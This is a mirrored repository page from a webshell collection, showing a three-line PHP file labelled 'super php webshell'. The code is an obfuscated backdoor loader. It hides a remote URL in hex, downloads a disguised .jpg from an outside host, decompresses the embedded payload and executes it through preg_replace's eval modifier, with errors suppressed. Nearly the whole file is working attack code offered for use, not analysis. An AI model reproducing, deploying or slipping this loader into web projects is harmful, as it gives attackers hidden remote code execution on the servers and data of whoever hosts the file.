mirror of
https://github.com/tennc/webshell
synced 2024-11-23 03:33:03 +00:00
3097d20015
super php webshell
3 lines
No EOL
353 B
PHP
3 lines
No EOL
353 B
PHP
<?php
|
|
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
|
|
?>
|